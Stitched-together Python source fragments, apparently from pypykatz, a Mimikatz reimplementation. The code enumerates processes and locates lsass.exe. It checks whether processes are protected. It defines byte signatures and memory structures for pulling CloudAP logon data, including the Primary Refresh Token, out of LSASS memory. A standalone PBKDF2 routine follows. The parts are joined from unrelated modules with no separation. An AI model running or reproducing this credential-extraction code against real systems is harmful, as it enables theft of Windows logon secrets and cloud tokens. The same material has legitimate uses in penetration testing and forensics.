PS_PROTECTED_TYPE_STRINGS = [None,"Light","Full"]
PS_PROTECTED_SIGNER_STRINGS = [None, "Authenticode", "CodeGen", "Antimalware", "Lsa", 
                            "Windows", "WinTcb", "WinSystem", "StoreApp"]
PS_PROTECTED_TYPE_OLD_OS_STRINGS = [None,"System protected process"]

#https://msdn.microsoft.com/en-us/library/windows/desktop/ms683217(v=vs.85).aspx
#def enum_process_names():
#	pid_to_fullname = {}
#	
#	for pid in EnumProcesses():
#		if pid == 0:
#			continue
#
#		pid_to_fullname[pid] = get_process_full_imagename(pid)
#	return pid_to_fullname

def enum_process_names():
	pid_to_name = {}
	
	for pid in EnumProcesses():
		if pid == 0:
			continue
		pid_to_name[pid] = 'Not found'
		try:
			process_handle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
		except Exception as e:
			continue
			
		pid_to_name[pid] = QueryFullProcessImageNameW(process_handle)
	return pid_to_name

def get_process_extended_basic_information(pid,process_handle=None):
    process_basic_info = PROCESS_EXTENDED_BASIC_INFORMATION()
    process_basic_info.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION)
    _NtQueryInformationProcess = windll.ntdll.NtQueryInformationProcess
    if process_handle == None:
        process_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)

    status = _NtQueryInformationProcess(process_handle,
                                       ProcessBasicInformation,
                                       byref(process_basic_info),
                                       process_basic_info.Size,
                                       None)
    if status < 0:
        raise ctypes.WinError()
    CloseHandle(process_handle)
    return process_basic_info


def get_protected_process_infos(pid,process_handle=None):
    process_protection_infos = None
    _NtQueryInformationProcess = windll.ntdll.NtQueryInformationProcess
    if process_handle == None:
        process_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
    if WINDOWS_BUILD_NUMBER >= WindowsMinBuild.WIN_8.value:
        protection_info = PS_PROTECTION()
        status = _NtQueryInformationProcess(process_handle,
                                           ProcessProtectionInformation,
                                           byref(protection_info),
                                           sizeof(protection_info),
                                           None)
        if status < 0:
            raise ctypes.WinError()
        if protection_info.Type > 0:
            process_protection_infos = {"level": protection_info.Level,
                                        "type": PS_PROTECTED_TYPE_STRINGS[protection_info.Type],
                                        "signer": PS_PROTECTED_SIGNER_STRINGS[protection_info.Signer],
                                        "audit": protection_info.Audit}
    else:
        _ps_extended_basic_information = get_process_extended_basic_information(pid,process_handle)
        if _ps_extended_basic_information.IsProtectedProcess:
            process_protection_infos = {"type": 'System protected process'}
    CloseHandle(process_handle)
    return process_protection_infos
	
def get_lsass_pid():
	pid_to_name = enum_process_names()
	for pid in pid_to_name:
		if pid_to_name[pid].lower().endswith('lsass.exe'):
			return pid
			
	raise Exception('Failed to find lsass.exe')



from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.commons.win_datatypes import ULONG, LUID, KIWI_GENERIC_PRIMARY_CREDENTIAL, POINTER, DWORD, PVOID, PSID, GUID, DWORD64
from pypykatz.lsadecryptor.package_commons import PackageTemplate

class CloudapTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Cloudap')
		self.signature = None
		self.first_entry_offset = None
		self.list_entry = None

	@staticmethod
	def get_template(sysinfo):
		template = CloudapTemplate()
		if sysinfo.buildnumber <= WindowsBuild.WIN_10_1903.value:
			return None

		if sysinfo.architecture == KatzSystemArchitecture.X64:
			template.signature = b'\x44\x8b\x01\x44\x39\x42\x18\x75'
			template.first_entry_offset = -9
			template.list_entry = PKIWI_CLOUDAP_LOGON_LIST_ENTRY
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			template.signature = b'\x8b\x31\x39\x72\x10\x75'
			template.first_entry_offset = -8
			template.list_entry = PKIWI_CLOUDAP_LOGON_LIST_ENTRY

		else:
			raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))
			
		template.log_template('list_entry', template.list_entry)
		return template

class PKIWI_CLOUDAP_CACHE_UNK(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CLOUDAP_CACHE_UNK)

class KIWI_CLOUDAP_CACHE_UNK:
	def __init__(self, reader):
		self.unk0 = DWORD(reader)
		self.unk1 = DWORD(reader)
		self.unk2 = DWORD(reader)
		self.unkSize = DWORD(reader).value
		self.guid = GUID(reader)
		self.unk = reader.read(64)


class PKIWI_CLOUDAP_CACHE_LIST_ENTRY(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CLOUDAP_CACHE_LIST_ENTRY)

class KIWI_CLOUDAP_CACHE_LIST_ENTRY:
	def __init__(self, reader):
		self.Flink = PKIWI_CLOUDAP_CACHE_LIST_ENTRY(reader)
		self.Blink = PKIWI_CLOUDAP_CACHE_LIST_ENTRY(reader)
		self.unk0 = DWORD(reader)
		reader.align()
		self.LockList = PVOID(reader)
		self.unk1 = PVOID(reader)
		self.unk2 = PVOID(reader)
		self.unk3 = PVOID(reader)
		self.unk4 = PVOID(reader)
		self.unk5 = PVOID(reader)
		self.unk6 = DWORD(reader)
		self.unk7 = DWORD(reader)
		self.unk8 = DWORD(reader)
		self.unk9 = DWORD(reader)
		self.unkLogin0 = PVOID(reader) #PCWSTR
		self.unkLogin1 = PVOID(reader) #PCWSTR
		self.toname = reader.read(130)  #wchar_t [64 + 1];
		reader.align()
		self.Sid = PSID(reader).value
		self.unk10 = DWORD(reader)
		self.unk11 = DWORD(reader)
		self.unk12 = DWORD(reader)
		self.unk13 = DWORD(reader)
		self.toDetermine = PKIWI_CLOUDAP_CACHE_UNK(reader)
		self.unk14 = PVOID(reader)
		self.cbPRT = DWORD(reader).value
		reader.align()
		self.PRT = PVOID(reader) #PBYTE(reader)

class PKIWI_CLOUDAP_LOGON_LIST_ENTRY(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CLOUDAP_LOGON_LIST_ENTRY)

class KIWI_CLOUDAP_LOGON_LIST_ENTRY:
	def __init__(self, reader):
		self.Flink = PKIWI_CLOUDAP_LOGON_LIST_ENTRY(reader)
		self.Blink = PKIWI_CLOUDAP_LOGON_LIST_ENTRY(reader)
		self.unk0 = DWORD(reader)
		self.unk1 = DWORD(reader)
		self.LocallyUniqueIdentifier = LUID(reader).value
		self.unk2 = DWORD64(reader)
		self.unk3 = DWORD64(reader)
		self.cacheEntry = PKIWI_CLOUDAP_CACHE_LIST_ENTRY(reader)




#https://codereview.stackexchange.com/questions/87538/python-pbkdf2-using-core-modules
import hmac
import struct
import hashlib

def pbkdf2(password, salt, iters, keylen, digestmod = hashlib.sha1):
	"""Run the PBKDF2 (Password-Based Key Derivation Function 2) algorithm
	and return the derived key. The arguments are:

	password (bytes or bytearray) -- the input password
	salt (bytes or bytearray) -- a cryptographic salt
	iters (int) -- number of iterations
	keylen (int) -- length of key to derive
	digestmod -- a cryptographic hash function: either a module
		supporting PEP 247, a hashlib constructor, or (in Python 3.4
		or later) the name of a hash function.

	For example:

	>>> import hashlib
	>>> from binascii import hexlify, unhexlify
	>>> password = b'Squeamish Ossifrage'
	>>> salt = unhexlify(b'1234567878563412')
	>>> hexlify(pbkdf2(password, salt, 500, 16, hashlib.sha1))
	b'9e8f1072bdf5ef042bd988c7da83e43b'

	"""
	h = hmac.new(password, digestmod=digestmod)
	def prf(data):
		hm = h.copy()
		hm.update(data)
		return bytearray(hm.digest())

	key = bytearray()
	i = 1
	while len(key) < keylen:
		T = U = prf(salt + struct.pack('>i', i))
		for _ in range(iters - 1):
			U = prf(U)
			T = bytearray(x ^ y for x, y in zip(T, U))
		key += T
		i += 1

	return key[:keylen]